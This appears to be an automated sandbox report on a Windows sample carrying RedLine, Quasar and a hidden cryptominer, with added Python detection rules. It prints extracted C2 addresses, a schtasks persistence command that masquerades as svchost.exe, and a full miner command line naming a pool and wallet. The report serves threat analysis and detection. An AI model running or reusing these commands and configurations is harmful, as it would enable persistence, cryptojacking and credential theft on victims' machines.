Analysis
max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240730-en
resource tags
arch:x64, arch:x86, image:win11-20240730-en, locale:en-us, os:windows11-21h2-x64, system
submitted
31-07-2024 00:22
Static task
static1
Behavioral task
behavioral1
Sample
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
Resource
win10v2004-20240730-en
Behavioral task
behavioral2
Sample
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
Resource
win11-20240730-en
General
-
Target
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
-
Size
294KB
-
MD5
58ccb4c9da26dbf5584194406ee2f4b3
-
SHA1
ae91798532b747f410099ef7d0e36bffeca6361c
-
SHA256
2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97
-
SHA512
dff6b4bf25fc5b5cf1a64ee645fb0310b072ec69c89a6e863cf9e0800e1d36f8dc4e567cf19c7dc8ac704d351b604cbf8d35959c3a64a10aa6b54f5c8fedb3c2
-
SSDEEP
6144:M3VPjut1s07wltS102nj9W0t3KMONuGfpul4EdSCM:gZjut1s0qQj9ztaMMdxop3M
Malware Config
Extracted
redline
exodusmarket.io
91.92.240.111:1334
Extracted
quasar
1.4.1
Office04
51.222.21.20:4782
374acc94-a8cd-45c6-bc31-752e0f83541d
-
encryption_key
5B2A5F50FABB3F6748116D7077D95758D0DFFC77
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\adada.exe | family_quasar
behavioral2/memory/2344-300-0x0000000000CC0000-0x0000000000FE4000-memory.dmp | family_quasar
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3772-1-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
SectopRAT payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3772-1-0x0000000000400000-0x000000000041E000-memory.dmp | family_sectoprat
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, the web browser credential store.
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
pid | process
5004 | pureee.exe
2344 | adada.exe
644 | dropperrr.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | process | target process
PID 2068 set thread context of 3772 | 2068 | 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe | RegAsm.exe
PID 5004 set thread context of 2004 | 5004 | pureee.exe | AddInProcess.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | dropperrr.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
pid | process
3772 | RegAsm.exe (2 events)
5004 | pureee.exe (19 events)
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3772 | RegAsm.exe
Token: SeDebugPrivilege | 2344 | adada.exe
Token: SeDebugPrivilege | 5004 | pureee.exe
Token: SeLockMemoryPrivilege | 2004 | AddInProcess.exe (2 events)
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
2004 | AddInProcess.exe
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
description | pid | process | target process
PID 2068 wrote to memory of 3772 | 2068 | 2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe | RegAsm.exe (8 events)
PID 3772 wrote to memory of 5004 | 3772 | RegAsm.exe | pureee.exe (2 events)
PID 3772 wrote to memory of 2344 | 3772 | RegAsm.exe | adada.exe (2 events)
PID 3772 wrote to memory of 644 | 3772 | RegAsm.exe | dropperrr.exe (3 events)
PID 2344 wrote to memory of 1528 | 2344 | adada.exe | schtasks.exe (2 events)
PID 5004 wrote to memory of 2004 | 5004 | pureee.exe | AddInProcess.exe (14 events)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
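Two of the signatures above are the ones a detection engineer would want to re-derive from raw events rather than trust as labels: a Temp-resident binary calling SetThreadContext (and WriteProcessMemory) on a .NET utility it has just spawned (the sample into RegAsm.exe, pureee.exe into AddInProcess.exe), which is the shape of process hollowing, and the schtasks /create run by adada.exe, which matches the Quasar config (install_name svchost.exe, startup_key svchost, subdirectory SubDir). The Python below is an added example, not part of this report or of any vendor's tooling. The event records are constructed from the report's process tree and signature rows; the field names are my own, the list of .NET host binaries is an assumption, and the root process's parent PID (1) is a placeholder.

```python
"""Re-derive the hollowing and scheduled-task findings from process events.

Added example; records are constructed from the sandbox report, field names
are mine (not a Tria.ge or Sysmon schema).
"""
import re
from dataclasses import dataclass

# .NET framework utilities commonly abused as hollowing hosts: the two seen in
# this report plus a few siblings (list is an assumption).
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "addinprocess.exe",
                "addinprocess32.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.I)
SYSTEM_DIRS = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class ThreadContextSet:
    """One 'PID a set thread context of b' row from the report."""
    source_pid: int
    target_pid: int


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_hollowing(procs, context_sets):
    """A binary under AppData resetting the thread context of a .NET host it
    itself spawned is the classic hollowing shape. Returns (src_pid, src_name,
    dst_pid, dst_name) tuples."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for ev in context_sets:
        src, dst = by_pid.get(ev.source_pid), by_pid.get(ev.target_pid)
        if src is None or dst is None:
            continue
        if (basename(dst.image) in DOTNET_HOSTS and dst.ppid == src.pid
                and USER_WRITABLE.match(src.image)):
            hits.append((src.pid, basename(src.image), dst.pid, basename(dst.image)))
    return hits


SCHTASKS_OPT = re.compile(r'/(tn|tr|sc|rl)\s+(?:"([^"]*)"|(\S+))', re.I)


def parse_schtasks_create(cmdline: str):
    """Return {tn, tr, sc, rl} for a 'schtasks /create' line, else None."""
    if "/create" not in cmdline.lower():
        return None
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in SCHTASKS_OPT.finditer(cmdline)}


def find_task_persistence(procs):
    """Flag task creation whose action binary lives in a user-writable path,
    asks for the highest run level, or masquerades as svchost.exe."""
    hits = []
    for p in procs:
        if basename(p.image) != "schtasks.exe":
            continue
        opts = parse_schtasks_create(p.cmdline)
        if not opts:
            continue
        target = opts.get("tr", "")
        reasons = []
        if USER_WRITABLE.match(target):
            reasons.append("task binary lives under AppData")
        if opts.get("rl", "").upper() == "HIGHEST":
            reasons.append("task requests highest run level")
        if basename(target) == "svchost.exe" and not SYSTEM_DIRS.match(target):
            reasons.append("svchost.exe outside System32 (name masquerading)")
        if reasons:
            hits.append({"pid": p.pid, "task": opts.get("tn"), "trigger": opts.get("sc"),
                         "binary": target, "reasons": reasons})
    return hits


# Constructed from the report's process tree (PIDs and paths as listed there;
# the root's parent PID 1 is a placeholder).
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = "2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe"
SAMPLE_PROCS = [
    Proc(2068, 1, TEMP + "\\" + SAMPLE, f'"{TEMP}\\{SAMPLE}"'),
    Proc(3772, 2068, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    Proc(5004, 3772, TEMP + r"\pureee.exe", f'"{TEMP}\\pureee.exe"'),
    Proc(2004, 5004, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe",
         r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k"),
    Proc(2344, 3772, TEMP + r"\adada.exe", f'"{TEMP}\\adada.exe"'),
    Proc(1528, 2344, r"C:\Windows\SYSTEM32\schtasks.exe",
         r'"schtasks" /create /tn "svchost" /sc ONLOGON '
         r'/tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f'),
    Proc(644, 3772, TEMP + r"\dropperrr.exe", f'"{TEMP}\\dropperrr.exe"'),
]
SAMPLE_CONTEXT_SETS = [ThreadContextSet(2068, 3772), ThreadContextSet(5004, 2004)]

if __name__ == "__main__":
    for hit in find_hollowing(SAMPLE_PROCS, SAMPLE_CONTEXT_SETS):
        print("hollowing: %d %s -> %d %s" % hit)
    for hit in find_task_persistence(SAMPLE_PROCS):
        print("persistence:", hit)
```

Both rules key on the parent/child relationship and the source path rather than on the injected process name alone, because RegAsm.exe and AddInProcess.exe are legitimate Microsoft binaries; the signal is who spawned them and from where. The schtasks rule reports its reasons separately so that a task under AppData with /rl HIGHEST and an svchost.exe name outside System32 scores three independent hits rather than one.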
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\2f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97.exe"
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2068
  [depth 2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3772
    [depth 3] C:\Users\Admin\AppData\Local\Temp\pureee.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\pureee.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 5004
      [depth 4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        PID: 2004
    [depth 3] C:\Users\Admin\AppData\Local\Temp\adada.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\adada.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2344
      [depth 4] C:\Windows\SYSTEM32\schtasks.exe
        command line: "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f
        - Scheduled Task/Job: Scheduled Task
        PID: 1528
    [depth 3] C:\Users\Admin\AppData\Local\Temp\dropperrr.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID: 644
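The command line under AddInProcess.exe (PID 2004) is what turns the tree into an actionable finding: pool, algorithm, wallet and worker are all in argv, so they can be extracted for blocking and attribution without touching the hollowed binary. The Python below is an added example, not part of this report or of any vendor's tooling. The option names (-o pool URL, -a algorithm, -k keep-alive, -u user, -p password, --cpu-max-threads-hint) are XMRig's, and the COIN:address.worker form of the -u value is the unMineable pool's convention; the report names neither, so both identifications are my assumptions. The two SeLockMemoryPrivilege rows for PID 2004 in the AdjustPrivilegeToken signature fit that reading, since that privilege is what a miner needs to back its RandomX dataset with large pages.

```python
"""Extract pool, algorithm, wallet and worker from a CPU-miner command line.

Added example, not from the report. Option names follow XMRig and the -u
layout follows unMineable (both assumptions; the report names neither).
"""
import shlex

# Constructed from the report's process tree entry for PID 2004.
SAMPLE_CMDLINE = (
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe "
    "-o rx.unmineable.com:3333 -a rx -k "
    "-u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU "
    "-p x --cpu-max-threads-hint=50"
)

VALUE_OPTS = {"-o": "pool", "--url": "pool", "-a": "algo", "--algo": "algo",
              "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass",
              "-t": "threads", "--threads": "threads",
              "--cpu-max-threads-hint": "threads_hint"}
FLAG_OPTS = {"-k": "keepalive", "--keepalive": "keepalive",
             "-B": "background", "--background": "background"}
# Algorithm names a CPU miner advertises; "rx" is RandomX (assumption).
MINER_ALGOS = {"rx", "rx/0", "rx/wow", "cn", "cn/r", "kawpow", "ethash", "ghostrider"}


def parse_miner_cmdline(cmdline):
    """Tokenise the way Windows does (quotes honoured, no backslash escapes)
    and map known options to names; unknown tokens are kept, not dropped."""
    argv = shlex.split(cmdline, posix=False)
    out = {"image": argv[0].strip('"'), "unknown": []}
    i = 1
    while i < len(argv):
        key, _, inline = argv[i].partition("=")      # handles --opt=value
        if key in VALUE_OPTS:
            if not inline:                           # value is the next token
                i += 1
                inline = argv[i] if i < len(argv) else ""
            out[VALUE_OPTS[key]] = inline
        elif key in FLAG_OPTS:
            out[FLAG_OPTS[key]] = True
        else:
            out["unknown"].append(argv[i])
        i += 1
    return out


def split_pool(pool):
    """'stratum+tcp://host:port' or 'host:port' -> (host, port or None)."""
    host_port = pool.partition("://")[2] or pool
    host, _, port = host_port.rpartition(":")
    if not host:                                     # no port given
        return host_port, None
    return host, int(port) if port.isdigit() else None


def split_unmineable_user(user):
    """'COIN:address.worker' -> (coin, address, worker); a bare
    'address.worker' keeps coin=None."""
    coin, sep, rest = user.partition(":")
    if not sep:
        coin, rest = None, user
    address, _, worker = rest.partition(".")
    return coin, address, worker or None


def miner_indicators(cmdline):
    p = parse_miner_cmdline(cmdline)
    pool_host, pool_port = split_pool(p["pool"]) if "pool" in p else (None, None)
    coin, wallet, worker = (split_unmineable_user(p["user"]) if "user" in p
                            else (None, None, None))
    return {
        "image": p["image"],
        "pool_host": pool_host, "pool_port": pool_port,
        "algo": p.get("algo"), "coin": coin, "wallet": wallet, "worker": worker,
        "threads_hint": p.get("threads_hint"),
        # A pool endpoint plus a mining algorithm is the high-confidence
        # signal; the image name (here a .NET host) does not affect the verdict.
        "is_miner": pool_host is not None and p.get("algo") in MINER_ALGOS,
    }


if __name__ == "__main__":
    print(miner_indicators(SAMPLE_CMDLINE))
```

The verdict deliberately ignores the image path: the same argv under notepad.exe or AddInProcess.exe is equally a miner, and keying on the host binary is exactly what the hollowing into a signed .NET utility is meant to defeat. The pool host and port are the network indicators to block; the wallet and worker name are attribution data worth keeping even though they are trivially changed.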
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3.1MB
MD5
9c682f5b5000cd003e76530706955a72
SHA1
1a69da76e05d114a317342dae3e9c7b10f107d43
SHA256
36e6a3dd4bfc86c4e707f43cd9515707442d6c424b7661cb41766cfdca322522
SHA512
33bd859542e1ae74d8c81427af44022cb91861dc02ee4202505f1e010487d06cb27e1aa83be6af17be4e2d8973289595b2ebe9bdf99a187956662df30b6dc88f
-
Filesize
476KB
MD5
35e7f1f850ca524d0eaa6522a4451834
SHA1
e98db252a62c84fd87416d2ec347de46ec053ebd
SHA256
2449fe334bbf8f09ff80422578a6c6961d20a0a456b214f6490c5ed1ae859c9e
SHA512
3b013378a51a29652ff84f61050b344f504ef51a51944d469b1d0e629e4abad979416a56b9cffb6cfe20b80dfbebffec35dce6f5dc10b02907dee538f9f17a01
-
Filesize
662KB
MD5
0006ad7b9f2a9b304e5b3790f6f18807
SHA1
00db2c60fca8aec6b504dd8fd4861a2e59a21fe9
SHA256
014d6c58dd7459c1664196ccd49b796f861d7d7e7e6c573bbb9cdc7cadc21450
SHA512
31fcde22e25be698ef2efd44cc65b758e8c9e8b62504f3254f9cc44bfaabdaa0c94cefceac12833372f8b2797b6bd0205bb9c8f1626e25ee4117d886198fb7db
-
Filesize
40KB
MD5
a182561a527f929489bf4b8f74f65cd7
SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD5
d780b7995f84e5487be452d63157855b
SHA1
7df258685a42cb5cbff54aca7a8f347f16397ea6
SHA256
cc4eb56ac9e6043d5476d834932ef8eb9cfd4abaabe88ed9f6afdc5b70d42619
SHA512
d58077340001c6a1bd2b3280316a668c87e3dc8a4c7a1f8ff362bc29436ba4a214b3157474546b9876db2144fb4b570d6d7ef66d84481072996ef1760fe6fdb5
-
Filesize
46KB
MD5
14ccc9293153deacbb9a20ee8f6ff1b7
SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765
-
Filesize
20KB
MD5
22be08f683bcc01d7a9799bbd2c10041
SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de
SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457
SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936
-
Filesize
112KB
MD5
87210e9e528a4ddb09c6b671937c79c6
SHA1
3c75314714619f5b55e25769e0985d497f0062f2
SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0
-
Filesize
96KB
MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1
d6582ba879235049134fa9a351ca8f0f785d8835
SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2